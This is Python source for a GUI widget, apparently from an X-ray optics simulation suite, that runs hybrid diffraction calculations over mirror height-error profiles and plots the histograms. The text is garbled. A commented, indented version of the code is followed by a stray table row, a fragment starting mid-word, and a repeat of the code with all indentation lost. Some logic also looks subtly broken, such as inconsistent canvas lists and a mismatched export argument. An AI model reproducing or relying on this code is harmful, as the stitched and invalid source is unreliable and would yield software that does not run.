                    # hybrid_control uses 1-based plane codes; the combo box is 0-based.
                    input_parameters.ghy_diff_plane = self.ghy_diff_plane + 1
                    # -1 tells hybrid_control to derive the value from the O.E. itself.
                    if self.distance_to_image_calc == 0:
                        input_parameters.ghy_distance = -1
                    else:
                        input_parameters.ghy_distance = self.ghy_distance
                    if self.focal_length_calc == 0:
                        input_parameters.ghy_focallength = -1
                    else:
                        input_parameters.ghy_focallength = self.ghy_focallength
                    input_parameters.ghy_nf = self.ghy_nf
                    input_parameters.ghy_nbins_x = int(self.ghy_nbins_x)
                    input_parameters.ghy_nbins_z = int(self.ghy_nbins_z)
                    input_parameters.ghy_npeak = int(self.ghy_npeak)
                    input_parameters.ghy_fftnpts = int(self.ghy_fftnpts)
                    input_parameters.file_to_write_out = self.file_to_write_out
                    input_parameters.ghy_automatic = self.ghy_automatic
                    # ------------------------------------------------------------------
                    # Reference pass: run once with NO error profile (F_RIPPLE = 0),
                    # before cycling over the figure-error files below.
                    shadow_beam = self.input_beam.duplicate()
                    history_entry = shadow_beam.getOEHistory(shadow_beam._oe_number)
                    shadow_oe = history_entry._shadow_oe_start # changes to the original object!
                    shadow_oe._oe.F_RIPPLE = 0
                    input_parameters.ghy_calcType = 2
                    input_parameters.shadow_beam = shadow_beam
                    calculation_parameters = hybrid_control.hy_run(input_parameters)
                    # hy_run may adjust these parameters; copy them back into the UI state.
                    self.ghy_focallength = input_parameters.ghy_focallength
                    self.ghy_distance = input_parameters.ghy_distance
                    self.ghy_nbins_x = int(input_parameters.ghy_nbins_x)
                    self.ghy_nbins_z = int(input_parameters.ghy_nbins_z)
                    self.ghy_npeak = int(input_parameters.ghy_npeak)
                    self.ghy_fftnpts = int(input_parameters.ghy_fftnpts)
                    if input_parameters.ghy_calcType == 3 or input_parameters.ghy_calcType == 4:
                        do_plot_x = True
                        do_plot_z = True
                    else:
                        # In automatic mode, skip a direction the beam was not cut in.
                        if self.ghy_automatic == 1:
                            do_plot_x = not calculation_parameters.beam_not_cut_in_x
                            do_plot_z = not calculation_parameters.beam_not_cut_in_z
                        else:
                            do_plot_x = True
                            do_plot_z = True
                    do_nf = input_parameters.ghy_nf == 1 and input_parameters.ghy_calcType > 1
                    if do_plot_x or do_plot_z:
                        self.setStatusMessage("Plotting Results")
                        profile = 0
                        self.current_histo_data_x_ff = None
                        self.current_histo_data_x_nf = None
                        self.current_histo_data_z_ff = None
                        self.current_histo_data_z_nf = None
                        self.current_stats_x_ff = None
                        self.current_stats_x_nf = None
                        self.current_stats_z_ff = None
                        self.current_stats_z_nf = None
                        histo_data_x_ff, \
                        histo_data_z_ff, \
                        histo_data_x_nf, \
                        histo_data_z_nf = self.plot_results(calculation_parameters=calculation_parameters,
                                                            do_nf=do_nf,
                                                            do_plot_x=do_plot_x,
                                                            do_plot_z=do_plot_z,
                                                            histo_data_x_ff=HistogramData(),
                                                            histo_data_z_ff=HistogramData(),
                                                            histo_data_x_nf=HistogramData(),
                                                            histo_data_z_nf=HistogramData(),
                                                            profile=profile)
                        if not histo_data_x_ff.bins is None: self.current_histo_data_x_ff = HistogramDataCollection(histo_data_x_ff)
                        if not histo_data_z_ff.bins is None: self.current_histo_data_z_ff = HistogramDataCollection(histo_data_z_ff)
                        if not histo_data_x_nf.bins is None: self.current_histo_data_x_nf = HistogramDataCollection(histo_data_x_nf)
                        if not histo_data_z_nf.bins is None: self.current_histo_data_z_nf = HistogramDataCollection(histo_data_z_nf)
                        stats_x_ff = StatisticalDataCollection(histo_data_x_ff)
                        stats_z_ff = StatisticalDataCollection(histo_data_z_ff)
                        stats_x_nf = StatisticalDataCollection(histo_data_x_nf)
                        stats_z_nf = StatisticalDataCollection(histo_data_z_nf)
                    # Error-profile passes: calcType 3/4 applies the figure error (F_RIPPLE = 1).
                    input_parameters.ghy_calcType = self.ghy_calcType + 3
                    for file in self.ghy_files:
                        shadow_beam = self.input_beam.duplicate()
                        history_entry = shadow_beam.getOEHistory(shadow_beam._oe_number)
                        shadow_oe = history_entry._shadow_oe_start # changes to the original object!
                        shadow_oe._oe.F_RIPPLE = 1
                        shadow_oe._oe.F_G_S = 2
                        file = congruence.checkFile(file)
                        ShadowCongruence.checkErrorProfileFile(file)
                        shadow_oe._oe.FILE_RIP = bytes(file, 'utf-8')
                        input_parameters.shadow_beam = shadow_beam
                        calculation_parameters = hybrid_control.hy_run(input_parameters)
                        if do_plot_x or do_plot_z:
                            self.setStatusMessage("Plotting Results")
                            profile += 1
                            histo_data_x_ff, \
                            histo_data_z_ff, \
                            histo_data_x_nf, \
                            histo_data_z_nf = self.plot_results(calculation_parameters,
                                                                do_nf,
                                                                do_plot_x,
                                                                do_plot_z,
                                                                histo_data_x_ff,
                                                                histo_data_z_ff,
                                                                histo_data_x_nf,
                                                                histo_data_z_nf,
                                                                profile)
                            if not histo_data_x_ff.bins is None: self.current_histo_data_x_ff.add_histogram_data(histo_data_x_ff)
                            if not histo_data_z_ff.bins is None: self.current_histo_data_z_ff.add_histogram_data(histo_data_z_ff)
                            if not histo_data_x_nf.bins is None: self.current_histo_data_x_nf.add_histogram_data(histo_data_x_nf)
                            if not histo_data_z_nf.bins is None: self.current_histo_data_z_nf.add_histogram_data(histo_data_z_nf)
                            stats_x_ff.add_statistical_data(histo_data_x_ff)
                            stats_z_ff.add_statistical_data(histo_data_z_ff)
                            stats_x_nf.add_statistical_data(histo_data_x_nf)
                            stats_z_nf.add_statistical_data(histo_data_z_nf)
                    # NOTE(review): stats_* / histo_data_* are only bound inside the
                    # "if do_plot_x or do_plot_z" block above; if both directions are
                    # suppressed the lines below raise NameError — confirm intended.
                    self.current_stats_x_ff = stats_x_ff
                    self.current_stats_z_ff = stats_z_ff
                    self.current_stats_x_nf = stats_x_nf
                    self.current_stats_z_nf = stats_z_nf
                    self.add_empty_curves(do_nf,
                                          do_plot_x,
                                          do_plot_z,
                                          histo_data_x_ff,
                                          histo_data_x_nf,
                                          histo_data_z_ff,
                                          histo_data_z_nf)
                    self.plot_stats(do_nf,
                                    do_plot_x,
                                    do_plot_z,
                                    stats_x_ff,
                                    stats_z_ff,
                                    stats_x_nf,
                                    stats_z_nf,)
                else:
                    raise Exception("Input Beam with no good rays")
            else:
                raise Exception("Empty Input Beam")
        except Exception as exception:
            QMessageBox.critical(self, "Error", str(exception), QMessageBox.Ok)
            if self.IS_DEVELOP: raise exception
        self.setStatusMessage("")
        self.progressBarFinished()
    def plot_results(self,
                     calculation_parameters,
                     do_nf,
                     do_plot_x,
                     do_plot_z,
                     histo_data_x_ff,
                     histo_data_z_ff,
                     histo_data_x_nf,
                     histo_data_z_nf,
                     profile):
        """Plot far-field (and optionally near-field) histograms for the enabled directions.

        Returns the four (possibly untouched) histogram holders as the tuple
        ``(x_ff, z_ff, x_nf, z_nf)``. Canvas index layout depends on
        ``ghy_diff_plane``: with both planes active, canvases 0/1 hold FF X/Z
        and 2/3 hold NF X/Z; in single-plane modes canvas 0 is FF and 1 is NF
        of the plotted direction. Columns: 1 = X (sagittal), 3 = Z (tangential).
        """
        # Sagittal (X) only.
        if self.ghy_diff_plane == 0:
            if do_plot_x:
                histo_data_x_ff = self.plot_histo(calculation_parameters.ff_beam, 1, progressBarValue=88,
                                                  plot_canvas_index=0, title="X",
                                                  xtitle=r'X [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
                                                  offset=histo_data_x_ff.offset, xrange=histo_data_x_ff.xrange)
                if do_nf:
                    histo_data_x_nf = self.plot_histo(calculation_parameters.nf_beam, 1, progressBarValue=96,
                                                      plot_canvas_index=1, title="X",
                                                      xtitle=r'X [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
                                                      offset=histo_data_x_nf.offset, xrange=histo_data_x_nf.xrange)
            else:
                # Direction suppressed: show placeholder images instead.
                if do_nf:
                    self.plot_emtpy(88, 0)
                    self.plot_emtpy(96, 1)
                else:
                    self.plot_emtpy(88, 0)
        # Tangential (Z) only.
        elif self.ghy_diff_plane == 1:
            if do_plot_z:
                histo_data_z_ff = self.plot_histo(calculation_parameters.ff_beam, 3, progressBarValue=88,
                                                  plot_canvas_index=0, title="Z",
                                                  xtitle=r'Z [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
                                                  offset=histo_data_z_ff.offset, xrange=histo_data_z_ff.xrange)
                if do_nf:
                    histo_data_z_nf = self.plot_histo(calculation_parameters.nf_beam, 3, progressBarValue=96,
                                                      plot_canvas_index=1, title="Z",
                                                      xtitle=r'Z [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
                                                      offset=histo_data_z_nf.offset, xrange=histo_data_z_nf.xrange)
            else:
                self.plot_emtpy(88, 0)
                if do_nf:
                    self.plot_emtpy(96, 1)
        # Both planes.
        elif self.ghy_diff_plane >= 2:
            if do_plot_x and do_plot_z:
                histo_data_x_ff = self.plot_histo(calculation_parameters.ff_beam, 1, progressBarValue=88,
                                                  plot_canvas_index=0, title="X",
                                                  xtitle=r'X [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
                                                  offset=histo_data_x_ff.offset, xrange=histo_data_x_ff.xrange)
                histo_data_z_ff = self.plot_histo(calculation_parameters.ff_beam, 3, progressBarValue=88,
                                                  plot_canvas_index=1, title="Z",
                                                  xtitle=r'Z [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
                                                  offset=histo_data_z_ff.offset, xrange=histo_data_z_ff.xrange)
                if do_nf:
                    histo_data_x_nf = self.plot_histo(calculation_parameters.nf_beam, 1, progressBarValue=96,
                                                      plot_canvas_index=2, title="X",
                                                      xtitle=r'X [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
                                                      offset=histo_data_x_nf.offset, xrange=histo_data_x_nf.xrange)
                    histo_data_z_nf = self.plot_histo(calculation_parameters.nf_beam, 3, progressBarValue=96,
                                                      plot_canvas_index=3, title="Z",
                                                      xtitle=r'Z [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
                                                      offset=histo_data_z_nf.offset, xrange=histo_data_z_nf.xrange)
            else:
                # Only one direction survived the automatic analysis: it takes canvases 0 (FF) and 1 (NF).
                if do_plot_x:
                    histo_data_x_ff = self.plot_histo(calculation_parameters.ff_beam, 1, progressBarValue=88,
                                                      plot_canvas_index=0, title="X",
                                                      xtitle=r'X [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
                                                      offset=histo_data_x_ff.offset, xrange=histo_data_x_ff.xrange)
                    if do_nf:
                        histo_data_x_nf = self.plot_histo(calculation_parameters.nf_beam, 1, progressBarValue=96,
                                                          plot_canvas_index=1, title="X",
                                                          xtitle=r'X [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
                                                          offset=histo_data_x_nf.offset, xrange=histo_data_x_nf.xrange)
                elif do_plot_z:
                    histo_data_z_ff = self.plot_histo(calculation_parameters.ff_beam, 3, progressBarValue=88,
                                                      plot_canvas_index=0, title="Z",
                                                      xtitle=r'Z [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
                                                      offset=histo_data_z_ff.offset, xrange=histo_data_z_ff.xrange)
                    if do_nf:
                        histo_data_z_nf = self.plot_histo(calculation_parameters.nf_beam, 3, progressBarValue=96,
                                                          plot_canvas_index=1, title="Z",
                                                          xtitle=r'Z [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
                                                          offset=histo_data_z_nf.offset, xrange=histo_data_z_nf.xrange)
                else:
                    self.plot_emtpy(88, 0)
                    if do_nf:
                        self.plot_emtpy(96, 1)
        return histo_data_x_ff, histo_data_z_ff, histo_data_x_nf, histo_data_z_nf
def add_empty_curves(self, do_nf, do_plot_x, do_plot_z, histo_data_x_ff, histo_data_x_nf, histo_data_z_ff,
histo_data_z_nf):
if self.ghy_diff_plane == 0:
if do_plot_x:
self.plot_canvas_stats[0].add_empty_curve(histo_data_x_ff)
if do_nf:
self.plot_canvas[1].add_empty_curve(histo_data_x_nf)
elif self.ghy_diff_plane == 1:
if do_plot_z:
self.plot_canvas[0].add_empty_curve(histo_data_z_ff)
if do_nf:
self.plot_canvas[1].add_empty_curve(histo_data_z_nf)
else:
if do_plot_x and do_plot_z:
self.plot_canvas[0].add_empty_curve(histo_data_x_ff)
self.plot_canvas[1].add_empty_curve(histo_data_z_ff)
if do_nf:
self.plot_canvas[2].add_empty_curve(histo_data_x_nf)
self.plot_canvas[3].add_empty_curve(histo_data_z_nf)
else:
if do_plot_x:
self.plot_canvas[0].add_empty_curve(histo_data_x_ff)
if do_nf:
self.plot_canvas[1].add_empty_curve(histo_data_x_nf)
elif do_plot_z:
self.plot_canvas[0].add_empty_curve(histo_data_z_ff)
if do_nf:
self.plot_canvas[1].add_empty_curve(histo_data_z_nf)
def plot_stats(self, do_nf, do_plot_x, do_plot_z, stats_x_ff, stats_z_ff, stats_x_nf, stats_z_nf):
if self.ghy_diff_plane == 0:
if do_plot_x:
self.plot_stat(stats_x_ff, 0)
if do_nf:
self.plot_stat(stats_x_nf, 1)
elif self.ghy_diff_plane == 1:
if do_plot_z:
self.plot_stat(stats_z_ff, 0)
if do_nf:
self.plot_stat(stats_z_nf, 1)
else:
if do_plot_x and do_plot_z:
self.plot_stat(stats_x_ff, 0)
self.plot_stat(stats_z_ff, 1)
if do_nf:
self.plot_stat(stats_x_nf, 2)
self.plot_stat(stats_z_nf, 3)
else:
if do_plot_x:
self.plot_stat(stats_x_ff, 0)
if do_nf:
self.plot_stat(stats_x_nf, 1)
elif do_plot_z:
self.plot_stat(stats_z_ff, 0)
if do_nf:
self.plot_stat(stats_z_nf, 1)
def plot_stat(self, stats, plot_canvas_index, sigma_um="$\mu$m"):
if self.plot_canvas_stats[plot_canvas_index] is None:
self.plot_canvas_stats[plot_canvas_index] = DoublePlotWidget(parent=None)
self.tab[plot_canvas_index][1].layout().addWidget(self.plot_canvas_stats[plot_canvas_index])
self.plot_canvas_stats[plot_canvas_index].plotCurves(stats.get_scan_values(),
stats.get_sigmas(),
stats.get_relative_peak_intensities(),
"Statistics",
"Profiles",
"Sigma [" + sigma_um + "]",
"Relative Peak Intensity")
def plot_histo(self, beam, col, nbins=100, progressBarValue=80, plot_canvas_index=0, title="", xtitle="", ytitle="",
profile=1, offset=0.0, xrange=None):
if self.plot_canvas[plot_canvas_index] is None:
if self.plot_type == 0:
self.plot_canvas[plot_canvas_index] = ScanHistoWidget(self.workspace_units_to_cm)
elif self.plot_type==1:
self.plot_canvas[plot_canvas_index] = Scan3DHistoWidget(self.workspace_units_to_cm,
type=Scan3DHistoWidget.PlotType.LINES if self.plot_type_3D==0 else Scan3DHistoWidget.PlotType.SURFACE)
self.tab[plot_canvas_index][0].layout().addWidget(self.plot_canvas[plot_canvas_index])
histo_data = self.plot_canvas[plot_canvas_index].plot_histo(beam=beam,
col=col,
nbins=nbins,
title=title,
xtitle=xtitle,
ytitle=ytitle,
histo_index=profile,
scan_variable_name="Profile #",
scan_variable_value=profile,
offset=offset,
xrange=xrange)
histo_data.scan_value=profile
self.progressBarSet(progressBarValue)
return histo_data
def check_fields(self):
if self.focal_length_calc == 1:
congruence.checkPositiveNumber(self.ghy_focallength, "Focal Length value")
if self.distance_to_image_calc == 1:
congruence.checkPositiveNumber(self.ghy_distance, "Distance to image value")
if self.ghy_diff_plane == 0 or self.ghy_diff_plane == 2:
congruence.checkStrictlyPositiveNumber(self.ghy_nbins_x, "Number of bins for I(Sagittal) histogram")
if self.ghy_diff_plane == 1 or self.ghy_diff_plane == 2:
congruence.checkStrictlyPositiveNumber(self.ghy_nbins_z, "Number of bins for I(Tangential) histogram")
if self.ghy_files is None or len(self.ghy_files) == 0 or (len(self.ghy_files) == 1 and self.ghy_files[0] == ""):
raise ValueError("Height Error Profiles list is empty")
congruence.checkStrictlyPositiveNumber(self.ghy_npeak, "Number of diffraction peaks")
congruence.checkStrictlyPositiveNumber(self.ghy_fftnpts, "Number of points for FFT")
def set_progress_bar(self, value):
if value >= 100:
self.progressBarFinished()
elif value <=0:
self.progressBarInit()
else:
self.progressBarSet(value)
    def status_message(self, message):
        """Forward *message* to the widget status bar."""
        # NOTE(review): appears to be the callback surface used by hybrid_control via
        # input_parameters.widget (set in run_hybrid) — confirm against hybrid_control.
        self.setStatusMessage(message)
    def write_stdout(self, text):
        """Append captured stdout *text* to the "System Output" area, keeping the cursor visible.

        Bound to EmittingStream(textWritten=...) in run_hybrid, so print output
        from the calculation is mirrored into the widget.
        """
        cursor = self.shadow_output.textCursor()
        cursor.movePosition(QTextCursor.End)
        cursor.insertText(text)
        self.shadow_output.setTextCursor(cursor)
        self.shadow_output.ensureCursorVisible()
def setPreProcessorData(self, data):
if data is not None:
if data.error_profile_data_file != ShadowPreProcessorData.NONE:
if isinstance(data.error_profile_data_file, str):
self.ghy_files.append(data.error_profile_data_file)
elif isinstance(data.error_profile_data_file, list):
self.ghy_files = data.error_profile_data_file
else:
raise ValueError("Error Profile Data File: format not recognized")
self.refresh_files_text_area()
def refresh_files_text_area(self):
text = ""
for file in self.ghy_files:
text += file + "\n"
self.files_area.setText(text)
def export_error_analysis(self):
output_folder = QFileDialog.getExistingDirectory(self, "Select Output Directory", directory=os.curdir)
if output_folder:
if not self.current_histo_data_x_ff is None:
write_histo_and_stats_file(histo_data=self.current_histo_data_x_ff,
stats=self.current_stats_x_ff,
suffix="_S_FF",
output_folder=output_folder)
if not self.current_histo_data_x_nf is None:
write_histo_and_stats_file(histo_data=self.current_histo_data_x_nf,
stats=self.current_stats_x_nf,
suffix="_S_NF",
output_folder=output_folder)
if not self.current_histo_data_z_ff is None:
write_histo_and_stats_file(histo_data=self.current_histo_data_z_ff,
stats=self.current_stats_z_ff,
suffix="_T_FF",
output_folder=output_folder)
if not self.current_histo_data_z_nf is None:
write_histo_and_stats_file(histo_data=self.current_histo_data_z_nf.bins,
stats=self.current_stats_z_nf,
suffix="_T_NF",
output_folder=output_folder)
QMessageBox.information(self, "Export Error Analysis Data", "Data saved into directory: " + output_folder, QMessageBox.Ok)
| 49.628014 | 174 | 0.556933 |
ontal")
self.le_nbins_z = oasysgui.lineEdit(box_2, self, "ghy_nbins_z", "Number of bins for I(Tangential) histogram", labelWidth=260, valueType=int, orientation="horizontal")
self.le_npeak = oasysgui.lineEdit(box_2, self, "ghy_npeak", "Number of diffraction peaks", labelWidth=260, valueType=int, orientation="horizontal")
self.le_fftnpts = oasysgui.lineEdit(box_2, self, "ghy_fftnpts", "Number of points for FFT", labelWidth=260, valueType=int, orientation="horizontal")
box_3 = oasysgui.widgetBox(tab_adv, "Propagation Parameters", addSpace=True, orientation="vertical", height=200)
self.cb_focal_length_calc = gui.comboBox(box_3, self, "focal_length_calc", label="Focal Length", labelWidth=180,
items=["Use O.E. Focal Distance", "Specify Value"],
callback=self.set_FocalLengthCalc,
sendSelectedValue=False, orientation="horizontal")
self.le_focal_length = oasysgui.lineEdit(box_3, self, "ghy_focallength", "Focal Length value", labelWidth=260, valueType=float, orientation="horizontal")
gui.separator(box_3)
self.cb_distance_to_image_calc = gui.comboBox(box_3, self, "distance_to_image_calc", label="Distance to image", labelWidth=150,
items=["Use O.E. Image Plane Distance", "Specify Value"],
callback=self.set_DistanceToImageCalc,
sendSelectedValue=False, orientation="horizontal")
self.le_distance_to_image = oasysgui.lineEdit(box_3, self, "ghy_distance", "Distance to Image value", labelWidth=260, valueType=float, orientation="horizontal")
gui.separator(box_3)
self.cb_nf = gui.comboBox(box_3, self, "ghy_nf", label="Near Field Calculation", labelWidth=310,
items=["No", "Yes"],
sendSelectedValue=False, orientation="horizontal", callback=self.set_NF)
box_4 = oasysgui.widgetBox(tab_adv, "Geometrical Parameters", addSpace=True, orientation="vertical", height=70)
gui.comboBox(box_4, self, "ghy_automatic", label="Analize geometry to avoid unuseful calculations", labelWidth=310,
items=["No", "Yes"],
sendSelectedValue=False, orientation="horizontal")
box_5 = oasysgui.widgetBox(tab_adv, "Plot Setting", addSpace=True, orientation="vertical", height=150)
gui.comboBox(box_5, self, "plot_type", label="Plot Type", labelWidth=310,
items=["2D", "3D"],
sendSelectedValue=False, orientation="horizontal", callback=self.set_PlotType)
self.box_pt_1 = oasysgui.widgetBox(box_5, "", addSpace=False, orientation="vertical", height=30)
self.box_pt_2 = oasysgui.widgetBox(box_5, "", addSpace=False, orientation="vertical", height=30)
gui.comboBox(self.box_pt_2, self, "plot_type_3D", label="3D Plot Aspect", labelWidth=310,
items=["Lines", "Surface"],
sendSelectedValue=False, orientation="horizontal")
self.set_DiffPlane()
self.set_DistanceToImageCalc()
self.set_CalculationType()
self.set_NF()
self.set_PlotType()
self.initializeTabs()
adv_other_box = oasysgui.widgetBox(tab_bas, "Export Data", addSpace=False, orientation="vertical")
gui.button(adv_other_box, self, "Export Error Analysis", callback=self.export_error_analysis)
self.shadow_output = oasysgui.textArea(height=580, width=800)
out_box = gui.widgetBox(out_tab, "System Output", addSpace=True, orientation="horizontal")
out_box.layout().addWidget(self.shadow_output)
def after_change_workspace_units(self):
label = self.le_focal_length.parent().layout().itemAt(0).widget()
label.setText(label.text() + " [" + self.workspace_units_label + "]")
label = self.le_distance_to_image.parent().layout().itemAt(0).widget()
label.setText(label.text() + " [" + self.workspace_units_label + "]")
def select_files(self):
files, _ = QFileDialog.getOpenFileNames(self,
"Select Height Error Profiles", "","Data Files (*.dat);;Sha Files (*.sha)",
options=QFileDialog.Options())
if files:
self.ghy_files = files
self.refresh_files_text_area()
def initializeTabs(self):
self.tabs.clear()
tabs = []
if self.ghy_diff_plane < 2:
tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Image Plane")))
self.tab = [[gui.createTabPage(tabs[0], "Position"), gui.createTabPage(tabs[0], "Stats")]]
if self.ghy_nf == 1:
tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Near Field")))
self.tab.append([gui.createTabPage(tabs[1], "Position"), gui.createTabPage(tabs[1], "Stats")])
elif self.ghy_diff_plane >= 2:
if self.ghy_nf == 1:
tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Image Plane (S)")))
tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Near Field (S)")))
tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Image Plane (T)")))
tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Near Field (T)")))
self.tab = [[gui.createTabPage(tabs[0], "Position"), gui.createTabPage(tabs[0], "Stats")],
[gui.createTabPage(tabs[1], "Position"), gui.createTabPage(tabs[1], "Stats")],
[gui.createTabPage(tabs[2], "Position"), gui.createTabPage(tabs[2], "Stats")],
[gui.createTabPage(tabs[3], "Position"), gui.createTabPage(tabs[3], "Stats")]
]
else:
tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Image Plane (S)")))
tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Image Plane (T)")))
self.tab = [[gui.createTabPage(tabs[0], "Position"), gui.createTabPage(tabs[0], "Stats")],
[gui.createTabPage(tabs[1], "Position"), gui.createTabPage(tabs[1], "Stats")]
]
for tab in tabs:
tab.setFixedHeight(self.IMAGE_HEIGHT)
tab.setFixedWidth(self.IMAGE_WIDTH)
self.plot_canvas = [None, None, None, None]
self.plot_canvas_stats = [None, None, None, None]
def plot_emtpy(self, progressBarValue, plot_canvas_index):
if self.plot_canvas[plot_canvas_index] is None:
widget = QWidget()
widget.setLayout(QHBoxLayout())
label = QLabel(widget)
label.setPixmap(QPixmap(QImage(os.path.join(resources.package_dirname("orangecontrib.shadow.widgets.extension"), "icons", "no_result.png"))))
widget.layout().addWidget(label)
self.plot_canvas[plot_canvas_index] = widget
self.tab[plot_canvas_index].layout().addWidget(self.plot_canvas[plot_canvas_index])
self.progressBarSet(progressBarValue)
def setBeam(self, beam):
if ShadowCongruence.checkEmptyBeam(beam):
if ShadowCongruence.checkGoodBeam(beam):
self.input_beam = beam
if self.is_automatic_run:
self.run_hybrid()
def set_PlotType(self):
self.plot_canvas = [None, None, None, None]
self.box_pt_1.setVisible(self.plot_type==0)
self.box_pt_2.setVisible(self.plot_type==1)
def set_DiffPlane(self):
self.le_nbins_x.setEnabled(self.ghy_diff_plane == 0 or self.ghy_diff_plane == 2)
self.le_nbins_z.setEnabled(self.ghy_diff_plane == 1 or self.ghy_diff_plane == 2)
if self.ghy_diff_plane != 2:
self.cb_nf.setEnabled(True)
else:
self.cb_nf.setEnabled(False)
self.ghy_nf = 0
self.set_NF()
def set_CalculationType(self):
if self.ghy_diff_plane != 2:
self.cb_nf.setEnabled(True)
else:
self.cb_nf.setEnabled(False)
self.ghy_nf = 0
self.set_NF()
def set_NF(self):
if self.ghy_nf == 0:
self.focal_length_calc = 0
self.distance_to_image_calc = 0
self.cb_focal_length_calc.setEnabled(False)
self.le_focal_length.setEnabled(False)
else:
self.cb_focal_length_calc.setEnabled(True)
self.le_focal_length.setEnabled(True)
self.set_FocalLengthCalc()
def set_FocalLengthCalc(self):
self.le_focal_length.setEnabled(self.focal_length_calc == 1)
def set_DistanceToImageCalc(self):
self.le_distance_to_image.setEnabled(self.distance_to_image_calc == 1)
def run_hybrid(self):
try:
self.setStatusMessage("")
self.progressBarInit()
self.initializeTabs()
if ShadowCongruence.checkEmptyBeam(self.input_beam):
if ShadowCongruence.checkGoodBeam(self.input_beam):
sys.stdout = EmittingStream(textWritten=self.write_stdout)
self.check_fields()
input_parameters = hybrid_control.HybridInputParameters()
input_parameters.ghy_lengthunit = self.workspace_units
input_parameters.widget = self
input_parameters.ghy_diff_plane = self.ghy_diff_plane + 1
if self.distance_to_image_calc == 0:
input_parameters.ghy_distance = -1
else:
input_parameters.ghy_distance = self.ghy_distance
if self.focal_length_calc == 0:
input_parameters.ghy_focallength = -1
else:
input_parameters.ghy_focallength = self.ghy_focallength
input_parameters.ghy_nf = self.ghy_nf
input_parameters.ghy_nbins_x = int(self.ghy_nbins_x)
input_parameters.ghy_nbins_z = int(self.ghy_nbins_z)
input_parameters.ghy_npeak = int(self.ghy_npeak)
input_parameters.ghy_fftnpts = int(self.ghy_fftnpts)
input_parameters.file_to_write_out = self.file_to_write_out
input_parameters.ghy_automatic = self.ghy_automatic
shadow_beam = self.input_beam.duplicate()
history_entry = shadow_beam.getOEHistory(shadow_beam._oe_number)
shadow_oe = history_entry._shadow_oe_start
shadow_oe._oe.F_RIPPLE = 0
input_parameters.ghy_calcType = 2
input_parameters.shadow_beam = shadow_beam
calculation_parameters = hybrid_control.hy_run(input_parameters)
self.ghy_focallength = input_parameters.ghy_focallength
self.ghy_distance = input_parameters.ghy_distance
self.ghy_nbins_x = int(input_parameters.ghy_nbins_x)
self.ghy_nbins_z = int(input_parameters.ghy_nbins_z)
self.ghy_npeak = int(input_parameters.ghy_npeak)
self.ghy_fftnpts = int(input_parameters.ghy_fftnpts)
if input_parameters.ghy_calcType == 3 or input_parameters.ghy_calcType == 4:
do_plot_x = True
do_plot_z = True
else:
if self.ghy_automatic == 1:
do_plot_x = not calculation_parameters.beam_not_cut_in_x
do_plot_z = not calculation_parameters.beam_not_cut_in_z
else:
do_plot_x = True
do_plot_z = True
do_nf = input_parameters.ghy_nf == 1 and input_parameters.ghy_calcType > 1
if do_plot_x or do_plot_z:
self.setStatusMessage("Plotting Results")
profile = 0
self.current_histo_data_x_ff = None
self.current_histo_data_x_nf = None
self.current_histo_data_z_ff = None
self.current_histo_data_z_nf = None
self.current_stats_x_ff = None
self.current_stats_x_nf = None
self.current_stats_z_ff = None
self.current_stats_z_nf = None
histo_data_x_ff, \
histo_data_z_ff, \
histo_data_x_nf, \
histo_data_z_nf = self.plot_results(calculation_parameters=calculation_parameters,
do_nf=do_nf,
do_plot_x=do_plot_x,
do_plot_z=do_plot_z,
histo_data_x_ff=HistogramData(),
histo_data_z_ff=HistogramData(),
histo_data_x_nf=HistogramData(),
histo_data_z_nf=HistogramData(),
profile=profile)
if not histo_data_x_ff.bins is None: self.current_histo_data_x_ff = HistogramDataCollection(histo_data_x_ff)
if not histo_data_z_ff.bins is None: self.current_histo_data_z_ff = HistogramDataCollection(histo_data_z_ff)
if not histo_data_x_nf.bins is None: self.current_histo_data_x_nf = HistogramDataCollection(histo_data_x_nf)
if not histo_data_z_nf.bins is None: self.current_histo_data_z_nf = HistogramDataCollection(histo_data_z_nf)
stats_x_ff = StatisticalDataCollection(histo_data_x_ff)
stats_z_ff = StatisticalDataCollection(histo_data_z_ff)
stats_x_nf = StatisticalDataCollection(histo_data_x_nf)
stats_z_nf = StatisticalDataCollection(histo_data_z_nf)
input_parameters.ghy_calcType = self.ghy_calcType + 3
for file in self.ghy_files:
shadow_beam = self.input_beam.duplicate()
history_entry = shadow_beam.getOEHistory(shadow_beam._oe_number)
shadow_oe = history_entry._shadow_oe_start
shadow_oe._oe.F_RIPPLE = 1
shadow_oe._oe.F_G_S = 2
file = congruence.checkFile(file)
ShadowCongruence.checkErrorProfileFile(file)
shadow_oe._oe.FILE_RIP = bytes(file, 'utf-8')
input_parameters.shadow_beam = shadow_beam
calculation_parameters = hybrid_control.hy_run(input_parameters)
if do_plot_x or do_plot_z:
self.setStatusMessage("Plotting Results")
profile += 1
histo_data_x_ff, \
histo_data_z_ff, \
histo_data_x_nf, \
histo_data_z_nf = self.plot_results(calculation_parameters,
do_nf,
do_plot_x,
do_plot_z,
histo_data_x_ff,
histo_data_z_ff,
histo_data_x_nf,
histo_data_z_nf,
profile)
if not histo_data_x_ff.bins is None: self.current_histo_data_x_ff.add_histogram_data(histo_data_x_ff)
if not histo_data_z_ff.bins is None: self.current_histo_data_z_ff.add_histogram_data(histo_data_z_ff)
if not histo_data_x_nf.bins is None: self.current_histo_data_x_nf.add_histogram_data(histo_data_x_nf)
